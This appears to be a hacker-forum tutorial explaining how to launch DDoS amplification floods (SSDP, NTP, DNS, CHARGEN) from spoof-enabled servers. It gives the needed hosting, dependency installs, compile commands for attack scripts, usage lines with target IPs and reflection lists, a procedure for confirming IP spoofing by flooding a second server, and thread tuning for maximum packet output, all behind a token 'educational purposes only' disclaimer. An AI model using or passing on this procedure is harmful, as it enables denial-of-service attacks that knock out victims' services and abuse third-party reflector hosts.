Spoof enabled Dedicated server or XEN/KVM VPS.
Any attack script: SSDP NTP DNS CHARGEN
Amp list made for the attack script.
This was written by: Reece Leu
Spoof-enabled hosts list.
http://www.ecatel.info/ (CDN SERVERS ONLY)
What is server amplification/spoofing?
These amplification scripts allow the server to send a request to an IP in the
amplification list which then reponds. It basically tells the IP/Server in the
amplification script to send information to the target. It does this rapidly
resulting in a mass-flood of packets. Hence the “Amplification” name.
Yes this is a basic explanation and isn’t the same for every attack script.
– Install the dependencies.
yum -y install gcc make php libpcap-devel libpcap libcap dstat screen
– Download the program called PuTTY to connect to your server.
– Connect to the server through PuTTY.
– Use an FTP Client to connect to your server to upload files.- How to compile attack scripts:
Note* Change the attackscript.c to your attack scripts name.
gcc -pthread attackscript.c -o attackscript
– How to use attack scripts:
– After running that command, it will give you parameters to enter. As an example below I will be using the SSDP script.
Usage: ./ssdp <target IP> <target port> <reflection file> <throttle> <time (optional)>
./ssdpattack 184.108.40.206 80 ssdpamplist.txt 2 100
Note* The throttle in this case is the amount of threads. Time of course is in seconds.
Amplification lists are needed depending on the attack scripts you would like to use. If you’d like to create your own amplification lists please click: Here
How to check if your server spoofs.
– Purchase a cheapo VPS that doesn’t have spoofing enabled.
– Open 3 PuTTY sessions, 2 connected to the spoof enabled server and 1 connected to the non-spoof enabled cheapo VPS.- Run DSTAT on the non-spoof enabled server & on 1 of the spoofable servers.
Note* Your screen should look like this: (I am using MTPuTTY which is essentially the same with multiple tabs.)
– Upload the attack script & amplist to the spoof-enabled server.
Note* In this case I will be using the SSDP attack script & amp list.
– Attack the non-spoofable server using the spoofable server not running dstat.
./ssdpattack 220.127.116.11 80 amplist.txt 2 10
– Watch the DSTAT on both servers. This is what you should see.
Note* If you do not see any incoming packets on your non-spoofable server but you attack server is sending packets. You either are hitting the wrong IP or your attack server does not spoof. If you dont see any packets being sent from your attack server, yours server does not spoof.
There you go! Enjoy your servers.
How many threads you should use.
out any more packets but you also want to use the least amount of threads
to do this.- Here is an example:
Using 2 threads my server sends 8000KBps. My CPU usage is at 10% used.
Using 4 threads my server sends 10MBps. My CPU usage is at 18% used.
Using 8 threads my server sends 10MBps. My CPU usage is at 25% used.
Using 10 threads my server sends 10MBps. My CPU usage is at 30% used.
I will want to use 4 threads as the server sends 10MBps but the CPU usage is the lowest.
– How to check the CPU usage on dstat.
Note* I was using the SSDP attack script with 20 threads.
Hope you enjoyed this little lesson on threads.
– If you need help, post below.
– Yes this tutorial is for the real big noobs.
– I’ll be adding more to this thread as I go.
This is for educational purposes only.
Leave a thanks if you enjoyed my tutorial. Have fun, be safe.
Don’t take the candy.